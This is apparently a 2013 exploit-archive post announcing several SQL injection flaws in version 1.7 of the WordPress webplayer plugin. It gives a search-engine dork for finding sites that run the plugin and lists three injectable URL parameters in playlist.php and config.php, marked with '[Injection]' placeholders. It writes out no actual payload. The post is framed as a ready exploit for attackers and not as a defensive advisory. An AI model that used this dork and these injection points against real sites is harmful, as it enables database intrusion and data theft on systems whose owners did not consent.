facebook facebook twitter rss

Wordpress Plugins - webplayer 1.7 Multiple Sql Injection Vulnerability

Author: AtT4CKxT3rR0r1ST , Published: 24-05-2013
Wordpress Plugins - webplayer 1.7 Multiple Sql Injection Vulnerability
==========================================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Script : http://hdwebplayer.com/wordpress
.:. Version : 1.7
.:. Dork : inurl:"/wp-content/plugins/webplayer/"
####################################################################
===[ Exploit ]===


Multiple Sql Injection Vulnerability:

site.com/wp-content/plugins/webplayer/playlist.php?playlistid=1[Injection]
site.com/wp-content/plugins/webplayer/config.php?id=1[Injection]
site.com/wp-content/plugins/webplayer/playlist.php?videoid=1[Injection]


####################################################################

Like us on Facebook :